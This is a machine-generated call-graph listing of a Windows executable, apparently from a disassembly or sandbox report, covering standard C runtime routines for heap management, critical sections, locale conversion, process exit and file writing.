13072->13075 13073 c7b391 GetOEMCP 13073->13074 13074->13027 13074->13028 13075->13074 13077 c7b370 40 API calls 13076->13077 13078 c7b7bc 13077->13078 13081 c7b80d IsValidCodePage 13078->13081 13083 c7b7c3 13078->13083 13084 c7b832 ___scrt_fastfail 13078->13084 13079 c7de3e TranslatorGuardHandler 5 API calls 13080 c7b63e 13079->13080 13080->13034 13080->13037 13082 c7b81f GetCPInfo 13081->13082 13081->13083 13082->13083 13082->13084 13083->13079 13281 c7b448 GetCPInfo 13084->13281 13357 c7b203 13086->13357 13088 c7b26a 13088->13030 13100 c7c5f5 13089->13100 13092 c7a875 IsProcessorFeaturePresent 13094 c7a880 13092->13094 13097 c797c0 _abort 8 API calls 13094->13097 13096 c7a86b 13096->13092 13099 c7a893 13096->13099 13097->13099 13130 c7c4a5 13099->13130 13133 c7c563 13100->13133 13103 c7c650 13104 c7c65c _GetRangeOfTrysToCheck 13103->13104 13105 c79ed4 _abort 20 API calls 13104->13105 13110 c7c689 _abort 13104->13110 13112 c7c683 _abort 13104->13112 13105->13112 13106 c7c6d5 13108 c79a46 _free 20 API calls 13106->13108 13107 c7c6b8 13156 c7e509 13107->13156 13109 c7c6da 13108->13109 13113 c7998a pre_c_initialization 26 API calls 13109->13113 13116 c7c701 13110->13116 13147 c7b1a4 EnterCriticalSection 13110->13147 13112->13106 13112->13107 13112->13110 13113->13107 13117 c7c760 13116->13117 13119 c7c758 13116->13119 13127 c7c78b 13116->13127 13148 c7b1ec LeaveCriticalSection 13116->13148 13117->13127 13149 c7c647 13117->13149 13122 c7c4a5 _abort 28 API calls 13119->13122 13122->13117 13125 c79e50 pre_c_initialization 38 API calls 13128 c7c7ee 13125->13128 13126 c7c647 _abort 38 API calls 13126->13127 13152 c7c810 13127->13152 13128->13107 13129 c79e50 pre_c_initialization 38 API calls 13128->13129 13129->13107 13160 c7c2b4 13130->13160 13136 c7c509 13133->13136 13135 c7a860 13135->13096 13135->13103 13137 c7c515 CallCatchBlock 13136->13137 13142 c7b1a4 EnterCriticalSection 13137->13142 13139 c7c523 13143 c7c557 13139->13143 13141 c7c54a CallCatchBlock 13141->13135 13142->13139 13146 c7b1ec LeaveCriticalSection 13143->13146 13145 c7c561 13145->13141 13146->13145 13147->13116 13148->13119 13150 c79e50 pre_c_initialization 38 API calls 13149->13150 13151 c7c64c 13150->13151 13151->13126 13153 c7c816 13152->13153 13154 c7c7df 13152->13154 13159 c7b1ec LeaveCriticalSection 13153->13159 13154->13107 13154->13125 13154->13128 13157 c7de3e TranslatorGuardHandler 5 API calls 13156->13157 13158 c7e514 13157->13158 13158->13158 13159->13154 13161 c7c2c0 _GetRangeOfTrysToCheck 13160->13161 13162 c7c2d8 13161->13162 13182 c7e0bd GetModuleHandleW 13161->13182 13191 c7b1a4 EnterCriticalSection 13162->13191 13166 c7c37e 13199 c7c3be 13166->13199 13170 c7c355 13173 c7c36d 13170->13173 13195 c7d49a 13170->13195 13171 c7c3c7 13177 c7e509 _abort 5 API calls 13171->13177 13172 c7c39b 13202 c7c3cd 13172->13202 13179 c7d49a _abort 5 API calls 13173->13179 13174 c7c2e0 13174->13166 13174->13170 13192 c7d8c3 13174->13192 13181 c7a89d 13177->13181 13179->13166 13183 c7c2cc 13182->13183 13183->13162 13184 c7c40e GetModuleHandleExW 13183->13184 13185 c7c44d 13184->13185 13186 c7c438 GetProcAddress 13184->13186 13187 c7c461 FreeLibrary 13185->13187 13188 c7c46a 13185->13188 13186->13185 13187->13188 13189 c7de3e TranslatorGuardHandler 5 API calls 13188->13189 13190 c7c474 13189->13190 13190->13162 13191->13174 13210 c7d5dd 13192->13210 13196 c7d4c9 13195->13196 13197 c7de3e TranslatorGuardHandler 5 API calls 13196->13197 13198 c7d4f2 13197->13198 13198->13173 13232 c7b1ec LeaveCriticalSection 13199->13232 13201 c7c397 13201->13171 13201->13172 13233 c7ad13 13202->13233 13205 c7c3fb 13208 c7c40e _abort 8 API calls 13205->13208 13206 c7c3db GetPEB 13206->13205 13207 c7c3eb GetCurrentProcess TerminateProcess 13206->13207 13207->13205 13209 c7c403 ExitProcess 13208->13209 13213 c7d58c 13210->13213 13212 c7d601 13212->13170 13214 c7d598 CallCatchBlock 13213->13214 13221 c7b1a4 EnterCriticalSection 13214->13221 13216 c7d5a6 13222 c7d64c 13216->13222 13220 c7d5c4 CallCatchBlock 13220->13212 13221->13216 13225 c7d66c 13222->13225 13226 c7d674 13222->13226 13223 c7de3e TranslatorGuardHandler 5 API calls 13224 c7d5b3 13223->13224 13228 c7d5d1 13224->13228 13225->13223 13226->13225 13227 c7a8fb _free 20 API calls 13226->13227 13227->13225 13231 c7b1ec LeaveCriticalSection 13228->13231 13230 c7d5db 13230->13220 13231->13230 13232->13201 13234 c7ad2e 13233->13234 13235 c7ad38 13233->13235 13237 c7de3e TranslatorGuardHandler 5 API calls 13234->13237 13236 c7a935 _abort 5 API calls 13235->13236 13236->13234 13238 c7ad96 13237->13238 13238->13205 13238->13206 13239->13067 13243 c7b1ec LeaveCriticalSection 13240->13243 13242 c7b793 13242->13067 13243->13242 13245 c760b0 13244->13245 13251 c760a6 13244->13251 13246 c79e50 pre_c_initialization 38 API calls 13245->13246 13245->13251 13247 c760d1 13246->13247 13252 c79f9f 13247->13252 13251->13072 13251->13073 13253 c79fb2 13252->13253 13254 c760ea 13252->13254 13253->13254 13260 c7b09c 13253->13260 13256 c79fcc 13254->13256 13257 c79fdf 13256->13257 13259 c79ff4 13256->13259 13258 c7b6fb __fassign 38 API calls 13257->13258 13257->13259 13258->13259 13259->13251 13261 c7b0a8 CallCatchBlock 13260->13261 13262 c79e50 pre_c_initialization 38 API calls 13261->13262 13263 c7b0b1 13262->13263 13271 c7b0ff CallCatchBlock 13263->13271 13272 c7b1a4 EnterCriticalSection 13263->13272 13265 c7b0cf 13273 c7b113 13265->13273 13270 c7a85b _abort 38 API calls 13270->13271 13271->13254 13272->13265 13274 c7b121 __fassign 13273->13274 13275 c7b0e3 13273->13275 13274->13275 13276 c7ae4d __fassign 20 API calls 13274->13276 13277 c7b102 13275->13277 13276->13275 13280 c7b1ec LeaveCriticalSection 13277->13280 13279 c7b0f6 13279->13270 13279->13271 13280->13279 13282 c7b52c 13281->13282 13287 c7b482 13281->13287 13284 c7de3e TranslatorGuardHandler 5 API calls 13282->13284 13286 c7b5d8 13284->13286 13286->13083 13291 c7a71e 13287->13291 13290 c7cc66 44 API calls 13290->13282 13292 c76093 __fassign 38 API calls 13291->13292 13293 c7a73e MultiByteToWideChar 13292->13293 13295 c7a814 13293->13295 13296 c7a77c 13293->13296 13297 c7de3e TranslatorGuardHandler 5 API calls 13295->13297 13298 c7bf3c __onexit 21 API calls 13296->13298 13301 c7a79d __alloca_probe_16 ___scrt_fastfail 13296->13301 13299 c7a837 13297->13299 13298->13301 13305 c7cc66 13299->13305 13300 c7a80e 13310 c7a83b 13300->13310 13301->13300 13303 c7a7e2 MultiByteToWideChar 13301->13303 13303->13300 13304 c7a7fe GetStringTypeW 13303->13304 13304->13300 13306 c76093 __fassign 38 API calls 13305->13306 13307 c7cc79 13306->13307 13314 c7ca49 13307->13314 13311 c7a847 13310->13311 13312 c7a858 13310->13312 13311->13312 13313 c7a8fb _free 20 API calls 13311->13313 13312->13295 13313->13312 13315 c7ca64 13314->13315 13316 c7ca8a MultiByteToWideChar 13315->13316 13317 c7cab4 13316->13317 13318 c7cc3e 13316->13318 13322 c7bf3c __onexit 21 API calls 13317->13322 13324 c7cad5 __alloca_probe_16 13317->13324 13319 c7de3e TranslatorGuardHandler 5 API calls 13318->13319 13320 c7b504 13319->13320 13320->13290 13321 c7cb1e MultiByteToWideChar 13323 c7cb37 13321->13323 13336 c7cb8a 13321->13336 13322->13324 13341 c7ac09 13323->13341 13324->13321 13324->13336 13326 c7a83b __freea 20 API calls 13326->13318 13328 c7cb61 13331 c7ac09 12 API calls 13328->13331 13328->13336 13329 c7cb99 13330 c7bf3c __onexit 21 API calls 13329->13330 13334 c7cbba __alloca_probe_16 13329->13334 13330->13334 13331->13336 13332 c7cc2f 13333 c7a83b __freea 20 API calls 13332->13333 13333->13336 13334->13332 13335 c7ac09 12 API calls 13334->13335 13337 c7cc0e 13335->13337 13336->13326 13337->13332 13338 c7cc1d WideCharToMultiByte 13337->13338 13338->13332 13339 c7cc5d 13338->13339 13340 c7a83b __freea 20 API calls 13339->13340 13340->13336 13342 c7a935 _abort 5 API calls 13341->13342 13343 c7ac30 13342->13343 13344 c7ac60 13343->13344 13345 c7ac39 LCMapStringEx 13343->13345 13352 c7ac91 13344->13352 13349 c7ac80 13345->13349 13350 c7de3e TranslatorGuardHandler 5 API calls 13349->13350 13351 c7ac8b 13350->13351 13351->13328 13351->13329 13351->13336 13353 c7a935 _abort 5 API calls 13352->13353 13354 c7acb8 13353->13354 13355 c7de3e TranslatorGuardHandler 5 API calls 13354->13355 13356 c7ac79 LCMapStringW 13355->13356 13356->13349 13358 c7b20f CallCatchBlock 13357->13358 13365 c7b1a4 EnterCriticalSection 13358->13365 13360 c7b219 13366 c7b26e 13360->13366 13364 c7b232 CallCatchBlock 13364->13088 13365->13360 13378 c7b98e 13366->13378 13368 c7b2bc 13369 c7b98e 26 API calls 13368->13369 13370 c7b2d8 13369->13370 13371 c7b98e 26 API calls 13370->13371 13372 c7b2f6 13371->13372 13373 c7b226 13372->13373 13374 c7a8fb _free 20 API calls 13372->13374 13375 c7b23a 13373->13375 13374->13373 13392 c7b1ec LeaveCriticalSection 13375->13392 13377 c7b244 13377->13364 13379 c7b99f 13378->13379 13385 c7b99b 13378->13385 13380 c7b9a6 13379->13380 13381 c7b9b9 ___scrt_fastfail 13379->13381 13382 c79a46 _free 20 API calls 13380->13382 13381->13385 13386 c7b9e7 13381->13386 13387 c7b9f0 13381->13387 13383 c7b9ab 13382->13383 13384 c7998a pre_c_initialization 26 API calls 13383->13384 13384->13385 13385->13368 13388 c79a46 _free 20 API calls 13386->13388 13387->13385 13390 c79a46 _free 20 API calls 13387->13390 13389 c7b9ec 13388->13389 13391 c7998a pre_c_initialization 26 API calls 13389->13391 13390->13389 13391->13385 13392->13377 11955 c814fb 11964 c81f39 GetEnvironmentStringsW 11955->11964 11959 c7a8fb _free 20 API calls 11960 c81548 11959->11960 11961 c8151e 11988 c7a8fb 11961->11988 11963 c81513 11963->11959 11965 c8150d 11964->11965 11966 c81f4d 11964->11966 11965->11963 11971 c8154e 11965->11971 11994 c7bf3c 11966->11994 11968 c7a8fb _free 20 API calls 11969 c81f7b FreeEnvironmentStringsW 11968->11969 11969->11965 11970 c81f61 11970->11968 11972 c8156c 11971->11972 11973 c7a89e _abort 20 API calls 11972->11973 11981 c815a6 11973->11981 11974 c81617 11975 c7a8fb _free 20 API calls 11974->11975 11976 c81631 11975->11976 11976->11961 11977 c7a89e _abort 20 API calls 11977->11981 11978 c81619 12204 c81648 11978->12204 11981->11974 11981->11977 11981->11978 11983 c8163b 11981->11983 11986 c7a8fb _free 20 API calls 11981->11986 12195 c7bf8a 11981->12195 12210 c7999a IsProcessorFeaturePresent 11983->12210 11984 c7a8fb _free 20 API calls 11984->11974 11986->11981 11987 c81647 11989 c7a906 HeapFree 11988->11989 11990 c7a92f _free 11988->11990 11989->11990 11991 c7a91b 11989->11991 11990->11963 11992 c79a46 _free 18 API calls 11991->11992 11993 c7a921 GetLastError 11992->11993 11993->11990 11995 c7bf7a 11994->11995 11996 c7bf4a _abort 11994->11996 12006 c79a46 11995->12006 11996->11995 11998 c7bf65 RtlAllocateHeap 11996->11998 12001 c7c86c 11996->12001 11998->11996 11999 c7bf78 11998->11999 11999->11970 12009 c7c8b0 12001->12009 12004 c7c8ac 12004->11996 12005 c7c882 12015 c7de3e 12005->12015 12028 c79ed4 GetLastError 12006->12028 12010 c7c8bc CallCatchBlock 12009->12010 12022 c7b1a4 EnterCriticalSection 12010->12022 12012 c7c8c7 12023 c7c8f9 12012->12023 12014 c7c8ee CallCatchBlock 12014->12005 12016 c7de47 12015->12016 12017 c7de49 IsProcessorFeaturePresent 12015->12017 12016->12004 12019 c7e1f7 12017->12019 12027 c7e1bb SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12019->12027 12021 c7e2da 12021->12004 12022->12012 12026 c7b1ec LeaveCriticalSection 12023->12026 12025 c7c900 12025->12014 12026->12025 12027->12021 12029 c79eed 12028->12029 12030 c79ef3 12028->12030 12047 c7aaf8 12029->12047 12034 c79f4a SetLastError 12030->12034 12054 c7a89e 12030->12054 12037 c79a4b 12034->12037 12035 c79f0d 12039 c7a8fb _free 17 API calls 12035->12039 12037->11999 12041 c79f13 12039->12041 12040 c79f29 12068 c79cc2 12040->12068 12042 c79f41 SetLastError 12041->12042 12042->12037 12045 c7a8fb _free 17 API calls 12046 c79f3a 12045->12046 12046->12034 12046->12042 12073 c7a935 12047->12073 12050 c7ab37 TlsGetValue 12051 c7ab2b 12050->12051 12052 c7de3e TranslatorGuardHandler 5 API calls 12051->12052 12053 c7ab48 12052->12053 12053->12030 12060 c7a8ab _abort 12054->12060 12055 c7a8eb 12057 c79a46 _free 19 API calls 12055->12057 12056 c7a8d6 RtlAllocateHeap 12058 c79f05 12056->12058 12056->12060 12057->12058 12058->12035 12061 c7ab4e 12058->12061 12059 c7c86c _abort 7 API calls 12059->12060 12060->12055 12060->12056 12060->12059 12062 c7a935 _abort 5 API calls 12061->12062 12063 c7ab75 12062->12063 12064 c7ab90 TlsSetValue 12063->12064 12065 c7ab84 12063->12065 12064->12065 12066 c7de3e TranslatorGuardHandler 5 API calls 12065->12066 12067 c79f22 12066->12067 12067->12035 12067->12040 12087 c79c9a 12068->12087 12074 c7a965 12073->12074 12077 c7a961 12073->12077 12074->12050 12074->12051 12075 c7a985 12075->12074 12078 c7a991 GetProcAddress 12075->12078 12077->12074 12077->12075 12080 c7a9d1 12077->12080 12079 c7a9a1 try_get_function 12078->12079 12079->12074 12081 c7a9f2 LoadLibraryExW 12080->12081 12085 c7a9e7 12080->12085 12082 c7aa27 12081->12082 12083 c7aa0f GetLastError 12081->12083 12082->12085 12086 c7aa3e FreeLibrary 12082->12086 12083->12082 12084 c7aa1a LoadLibraryExW 12083->12084 12084->12082 12085->12077 12086->12085 12093 c79bda 12087->12093 12089 c79cbe 12090 c79c4a 12089->12090 12104 c79ade 12090->12104 12092 c79c6e 12092->12045 12094 c79be6 CallCatchBlock 12093->12094 12099 c7b1a4 EnterCriticalSection 12094->12099 12096 c79bf0 12100 c79c16 12096->12100 12098 c79c0e CallCatchBlock 12098->12089 12099->12096 12103 c7b1ec LeaveCriticalSection 12100->12103 12102 c79c20 12102->12098 12103->12102 12105 c79aea CallCatchBlock 12104->12105 12112 c7b1a4 EnterCriticalSection 12105->12112 12107 c79af4 12113 c79e05 12107->12113 12109 c79b0c 12117 c79b22 12109->12117 12111 c79b1a CallCatchBlock 12111->12092 12112->12107 12114 c79e14 __fassign 12113->12114 12115 c79e3b __fassign 12113->12115 12114->12115 12120 c7ae4d 12114->12120 12115->12109 12194 c7b1ec LeaveCriticalSection 12117->12194 12119 c79b2c 12119->12111 12121 c7aecd 12120->12121 12125 c7ae63 12120->12125 12122 c7af1b 12121->12122 12124 c7a8fb _free 20 API calls 12121->12124 12188 c7afc0 12122->12188 12126 c7aeef 12124->12126 12125->12121 12127 c7ae96 12125->12127 12131 c7a8fb _free 20 API calls 12125->12131 12128 c7a8fb _free 20 API calls 12126->12128 12133 c7a8fb _free 20 API calls 12127->12133 12147 c7aeb8 12127->12147 12129 c7af02 12128->12129 12132 c7a8fb _free 20 API calls 12129->12132 12130 c7a8fb _free 20 API calls 12134 c7aec2 12130->12134 12136 c7ae8b 12131->12136 12138 c7af10 12132->12138 12139 c7aead 12133->12139 12140 c7a8fb _free 20 API calls 12134->12140 12135 c7af89 12141 c7a8fb _free 20 API calls 12135->12141 12148 c7bcb5 12136->12148 12137 c7af29 12137->12135 12143 c7a8fb 20 API calls _free 12137->12143 12144 c7a8fb _free 20 API calls 12138->12144 12176 c7bdb3 12139->12176 12140->12121 12146 c7af8f 12141->12146 12143->12137 12144->12122 12146->12115 12147->12130 12149 c7bcc6 12148->12149 12150 c7bdaf 12148->12150 12151 c7bcd7 12149->12151 12152 c7a8fb _free 20 API calls 12149->12152 12150->12127 12153 c7bce9 12151->12153 12155 c7a8fb _free 20 API calls 12151->12155 12152->12151 12154 c7bcfb 12153->12154 12156 c7a8fb _free 20 API calls 12153->12156 12157 c7bd0d 12154->12157 12158 c7a8fb _free 20 API calls 12154->12158 12155->12153 12156->12154 12159 c7bd1f 12157->12159 12160 c7a8fb _free 20 API calls 12157->12160 12158->12157 12161 c7bd31 12159->12161 12163 c7a8fb _free 20 API calls 12159->12163 12160->12159 12162 c7bd43 12161->12162 12164 c7a8fb _free 20 API calls 12161->12164 12165 c7bd55 12162->12165 12166 c7a8fb _free 20 API calls 12162->12166 12163->12161 12164->12162 12167 c7bd67 12165->12167 12168 c7a8fb _free 20 API calls 12165->12168 12166->12165 12169 c7bd79 12167->12169 12171 c7a8fb _free 20 API calls 12167->12171 12168->12167 12170 c7bd8b 12169->12170 12172 c7a8fb _free 20 API calls 12169->12172 12173 c7bd9d 12170->12173 12174 c7a8fb _free 20 API calls 12170->12174 12171->12169 12172->12170 12173->12150 12175 c7a8fb _free 20 API calls 12173->12175 12174->12173 12175->12150 12177 c7bdc0 12176->12177 12178 c7be18 12176->12178 12179 c7bdd0 12177->12179 12180 c7a8fb _free 20 API calls 12177->12180 12178->12147 12181 c7bde2 12179->12181 12182 c7a8fb _free 20 API calls 12179->12182 12180->12179 12183 c7bdf4 12181->12183 12184 c7a8fb _free 20 API calls 12181->12184 12182->12181 12185 c7be06 12183->12185 12186 c7a8fb _free 20 API calls 12183->12186 12184->12183 12185->12178 12187 c7a8fb _free 20 API calls 12185->12187 12186->12185 12187->12178 12189 c7afeb 12188->12189 12190 c7afcd 12188->12190 12189->12137 12190->12189 12191 c7be58 __fassign 20 API calls 12190->12191 12192 c7afe5 12191->12192 12193 c7a8fb _free 20 API calls 12192->12193 12193->12189 12194->12119 12196 c7bf97 12195->12196 12197 c7bfa5 12195->12197 12196->12197 12201 c7bfbe 12196->12201 12198 c79a46 _free 20 API calls 12197->12198 12199 c7bfaf 12198->12199 12214 c7998a 12199->12214 12202 c7bfb9 12201->12202 12203 c79a46 _free 20 API calls 12201->12203 12202->11981 12203->12199 12205 c8161f 12204->12205 12206 c81655 12204->12206 12205->11984 12207 c8166c 12206->12207 12209 c7a8fb _free 20 API calls 12206->12209 12208 c7a8fb _free 20 API calls 12207->12208 12208->12205 12209->12206 12211 c799a5 12210->12211 12228 c797c0 12211->12228 12217 c7990f 12214->12217 12216 c79996 12216->12202 12218 c79ed4 _abort 20 API calls 12217->12218 12219 c79925 12218->12219 12220 c79984 12219->12220 12223 c79933 12219->12223 12221 c7999a pre_c_initialization 11 API calls 12220->12221 12222 c79989 12221->12222 12224 c7990f pre_c_initialization 26 API calls 12222->12224 12226 c7de3e TranslatorGuardHandler 5 API calls 12223->12226 12225 c79996 12224->12225 12225->12216 12227 c7995a 12226->12227 12227->12216 12229 c797dc _abort ___scrt_fastfail 12228->12229 12230 c79808 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12229->12230 12231 c798d9 _abort 12230->12231 12232 c7de3e TranslatorGuardHandler 5 API calls 12231->12232 12233 c798f7 GetCurrentProcess TerminateProcess 12232->12233 12233->11987 14511 c7a00f 14512 c7a01b CallCatchBlock 14511->14512 14513 c7a052 CallCatchBlock 14512->14513 14519 c7b1a4 EnterCriticalSection 14512->14519 14515 c7a02f 14516 c7b113 __fassign 20 API calls 14515->14516 14517 c7a03f 14516->14517 14520 c7a058 14517->14520 14519->14515 14523 c7b1ec LeaveCriticalSection 14520->14523 14522 c7a05f 14522->14513 14523->14522 14524 c7dc0e 14525 c7dc16 pre_c_initialization 14524->14525 14542 c8176f 14525->14542 14527 c7dc21 pre_c_initialization 14549 c7e5cc 14527->14549 14529 c7dcaa 14530 c7df6f ___scrt_fastfail 4 API calls 14529->14530 14531 c7dcb1 ___scrt_initialize_default_local_stdio_options 14530->14531 14532 c7dc36 __RTC_Initialize 14532->14529 14554 c7e76d 14532->14554 14534 c7dc4f pre_c_initialization 14534->14529 14535 c7dc60 14534->14535 14557 c7e82b InitializeSListHead 14535->14557 14537 c7dc65 pre_c_initialization ___InternalCxxFrameHandler 14558 c7e837 14537->14558 14539 c7dc88 pre_c_initialization 14564 c7a061 14539->14564 14541 c7dc93 pre_c_initialization 14543 c8177e 14542->14543 14544 c817a1 14542->14544 14543->14544 14545 c79a46 _free 20 API calls 14543->14545 14544->14527 14546 c81791 14545->14546 14547 c7998a pre_c_initialization 26 API calls 14546->14547 14548 c8179c 14547->14548 14548->14527 14550 c7e5da 14549->14550 14553 c7e5df ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 14549->14553 14551 c7df6f ___scrt_fastfail 4 API calls 14550->14551 14550->14553 14552 c7e662 14551->14552 14553->14532 14571 c7e732 14554->14571 14557->14537 14637 c818fb 14558->14637 14560 c7e848 14561 c7e84f 14560->14561 14562 c7df6f ___scrt_fastfail 4 API calls 14560->14562 14561->14539 14563 c7e857 14562->14563 14565 c79e50 pre_c_initialization 38 API calls 14564->14565 14566 c7a06c 14565->14566 14567 c79a46 _free 20 API calls 14566->14567 14570 c7a0a4 14566->14570 14568 c7a099 14567->14568 14569 c7998a pre_c_initialization 26 API calls 14568->14569 14569->14570 14570->14541 14572 c7e756 14571->14572 14573 c7e74f 14571->14573 14580 c7d91d 14572->14580 14577 c7d8ad 14573->14577 14576 c7e754 14576->14534 14578 c7d91d __onexit 29 API calls 14577->14578 14579 c7d8bf 14578->14579 14579->14576 14583 c7d605 14580->14583 14586 c7d53b 14583->14586 14585 c7d629 14585->14576 14587 c7d547 CallCatchBlock 14586->14587 14594 c7b1a4 EnterCriticalSection 14587->14594 14589 c7d555 14595 c7d76c 14589->14595 14591 c7d562 14605 c7d580 14591->14605 14593 c7d573 CallCatchBlock 14593->14585 14594->14589 14596 c7d78a 14595->14596 14603 c7d782 try_get_function 14595->14603 14597 c7d7e3 14596->14597 14596->14603 14608 c7dafa 14596->14608 14599 c7dafa __onexit 29 API calls 14597->14599 14597->14603 14601 c7d7f9 14599->14601 14600 c7d7d9 14602 c7a8fb _free 20 API calls 14600->14602 14604 c7a8fb _free 20 API calls 14601->14604 14602->14597 14603->14591 14604->14603 14636 c7b1ec LeaveCriticalSection 14605->14636 14607 c7d58a 14607->14593 14609 c7db05 14608->14609 14610 c7db2d 14609->14610 14611 c7db1e 14609->14611 14614 c7db3c 14610->14614 14617 c7db72 14610->14617 14612 c79a46 _free 20 API calls 14611->14612 14616 c7db23 ___scrt_fastfail 14612->14616 14624 c7dba5 14614->14624 14616->14600 14618 c7db92 HeapSize 14617->14618 14619 c7db7d 14617->14619 14618->14614 14620 c79a46 _free 20 API calls 14619->14620 14621 c7db82 14620->14621 14622 c7998a pre_c_initialization 26 API calls 14621->14622 14623 c7db8d 14622->14623 14623->14614 14625 c7dbb2 14624->14625 14626 c7dbbd 14624->14626 14627 c7bf3c __onexit 21 API calls 14625->14627 14628 c7dbc5 14626->14628 14634 c7dbce _abort 14626->14634 14632 c7dbba 14627->14632 14629 c7a8fb _free 20 API calls 14628->14629 14629->14632 14630 c7dbd3 14633 c79a46 _free 20 API calls 14630->14633 14631 c7dbf8 HeapReAlloc 14631->14632 14631->14634 14632->14616 14633->14632 14634->14630 14634->14631 14635 c7c86c _abort 7 API calls 14634->14635 14635->14634 14636->14607 14638 c81919 pre_c_initialization 14637->14638 14641 c81939 pre_c_initialization 14637->14641 14639 c79a46 _free 20 API calls 14638->14639 14640 c8192f 14639->14640 14642 c7998a pre_c_initialization 26 API calls 14640->14642 14641->14560 14642->14641 15286 c82b17 15296 c83153 15286->15296 15290 c82b24 15309 c832d4 15290->15309 15293 c82b4e 15294 c7a8fb _free 20 API calls 15293->15294 15295 c82b59 15294->15295 15313 c8315c 15296->15313 15298 c82b1f 15299 c83234 15298->15299 15300 c83240 CallCatchBlock 15299->15300 15333 c7b1a4 EnterCriticalSection 15300->15333 15302 c832b6 15347 c832cb 15302->15347 15304 c8328a DeleteCriticalSection 15306 c7a8fb _free 20 API calls 15304->15306 15308 c8324b 15306->15308 15307 c832c2 CallCatchBlock 15307->15290 15308->15302 15308->15304 15334 c8404c 15308->15334 15310 c832ea 15309->15310 15311 c82b33 DeleteCriticalSection 15309->15311 15310->15311 15312 c7a8fb _free 20 API calls 15310->15312 15311->15290 15311->15293 15312->15311 15314 c83168 CallCatchBlock 15313->15314 15323 c7b1a4 EnterCriticalSection 15314->15323 15316 c8320b 15328 c8322b 15316->15328 15320 c83217 CallCatchBlock 15320->15298 15321 c8310c 66 API calls 15322 c83177 15321->15322 15322->15316 15322->15321 15324 c82b63 EnterCriticalSection 15322->15324 15325 c83201 15322->15325 15323->15322 15324->15322 15331 c82b77 LeaveCriticalSection 15325->15331 15327 c83209 15327->15322 15332 c7b1ec LeaveCriticalSection 15328->15332 15330 c83232 15330->15320 15331->15327 15332->15330 15333->15308 15335 c84058 CallCatchBlock 15334->15335 15336 c84069 15335->15336 15337 c8407e 15335->15337 15338 c79a46 _free 20 API calls 15336->15338 15339 c84079 CallCatchBlock 15337->15339 15350 c82b63 EnterCriticalSection 15337->15350 15340 c8406e 15338->15340 15339->15308 15343 c7998a pre_c_initialization 26 API calls 15340->15343 15342 c8409a 15351 c83fd6 15342->15351 15343->15339 15345 c840a5 15367 c840c2 15345->15367 15615 c7b1ec LeaveCriticalSection 15347->15615 15349 c832d2 15349->15307 15350->15342 15352 c83ff8 15351->15352 15353 c83fe3 15351->15353 15358 c83ff3 15352->15358 15370 c830a6 15352->15370 15354 c79a46 _free 20 API calls 15353->15354 15355 c83fe8 15354->15355 15357 c7998a pre_c_initialization 26 API calls 15355->15357 15357->15358 15358->15345 15360 c832d4 20 API calls 15361 c84014 15360->15361 15376 c82a29 15361->15376 15363 c8401a 15383 c844da 15363->15383 15366 c7a8fb _free 20 API calls 15366->15358 15614 c82b77 LeaveCriticalSection 15367->15614 15369 c840ca 15369->15339 15371 c830be 15370->15371 15375 c830ba 15370->15375 15372 c82a29 26 API calls 15371->15372 15371->15375 15373 c830de 15372->15373 15398 c839d1 15373->15398 15375->15360 15377 c82a4a 15376->15377 15378 c82a35 15376->15378 15377->15363 15379 c79a46 _free 20 API calls 15378->15379 15380 c82a3a 15379->15380 15381 c7998a pre_c_initialization 26 API calls 15380->15381 15382 c82a45 15381->15382 15382->15363 15384 c844e9 15383->15384 15385 c844fe 15383->15385 15387 c79a33 __dosmaperr 20 API calls 15384->15387 15386 c84539 15385->15386 15390 c84525 15385->15390 15388 c79a33 __dosmaperr 20 API calls 15386->15388 15389 c844ee 15387->15389 15391 c8453e 15388->15391 15392 c79a46 _free 20 API calls 15389->15392 15571 c844b2 15390->15571 15394 c79a46 _free 20 API calls 15391->15394 15395 c84020 15392->15395 15396 c84546 15394->15396 15395->15358 15395->15366 15397 c7998a pre_c_initialization 26 API calls 15396->15397 15397->15395 15399 c839dd CallCatchBlock 15398->15399 15400 c839fd 15399->15400 15401 c839e5 15399->15401 15402 c83a9b 15400->15402 15408 c83a32 15400->15408 15423 c79a33 15401->15423 15404 c79a33 __dosmaperr 20 API calls 15402->15404 15407 c83aa0 15404->15407 15406 c79a46 _free 20 API calls 15416 c839f2 CallCatchBlock 15406->15416 15409 c79a46 _free 20 API calls 15407->15409 15426 c820d0 EnterCriticalSection 15408->15426 15411 c83aa8 15409->15411 15413 c7998a pre_c_initialization 26 API calls 15411->15413 15412 c83a38 15414 c83a69 15412->15414 15415 c83a54 15412->15415 15413->15416 15427 c83abc 15414->15427 15417 c79a46 _free 20 API calls 15415->15417 15416->15375 15419 c83a59 15417->15419 15421 c79a33 __dosmaperr 20 API calls 15419->15421 15420 c83a64 15478 c83a93 15420->15478 15421->15420 15424 c79ed4 _abort 20 API calls 15423->15424 15425 c79a38 15424->15425 15425->15406 15426->15412 15428 c83aea 15427->15428 15466 c83ae3 15427->15466 15429 c83b0d 15428->15429 15430 c83aee 15428->15430 15433 c83b5e 15429->15433 15434 c83b41 15429->15434 15432 c79a33 __dosmaperr 20 API calls 15430->15432 15431 c7de3e TranslatorGuardHandler 5 API calls 15435 c83cc4 15431->15435 15436 c83af3 15432->15436 15438 c83b74 15433->15438 15481 c83fbb 15433->15481 15437 c79a33 __dosmaperr 20 API calls 15434->15437 15435->15420 15439 c79a46 _free 20 API calls 15436->15439 15443 c83b46 15437->15443 15484 c83661 15438->15484 15441 c83afa 15439->15441 15444 c7998a pre_c_initialization 26 API calls 15441->15444 15446 c79a46 _free 20 API calls 15443->15446 15444->15466 15449 c83b4e 15446->15449 15447 c83bbb 15453 c83bcf 15447->15453 15454 c83c15 WriteFile 15447->15454 15448 c83b82 15450 c83ba8 15448->15450 15451 c83b86 15448->15451 15452 c7998a pre_c_initialization 26 API calls 15449->15452 15496 c83441 GetConsoleCP 15450->15496 15457 c83c7c 15451->15457 15491 c835f4 15451->15491 15452->15466 15455 c83c05 15453->15455 15456 c83bd7 15453->15456 15459 c83c38 GetLastError 15454->15459 15464 c83b9e 15454->15464 15522 c836d7 15455->15522 15460 c83bdc 15456->15460 15461 c83bf5 15456->15461 15457->15466 15467 c79a46 _free 20 API calls 15457->15467 15459->15464 15460->15457 15507 c837b6 15460->15507 15514 c838a4 15461->15514 15464->15457 15464->15466 15468 c83c58 15464->15468 15466->15431 15470 c83ca1 15467->15470 15472 c83c5f 15468->15472 15473 c83c73 15468->15473 15471 c79a33 __dosmaperr 20 API calls 15470->15471 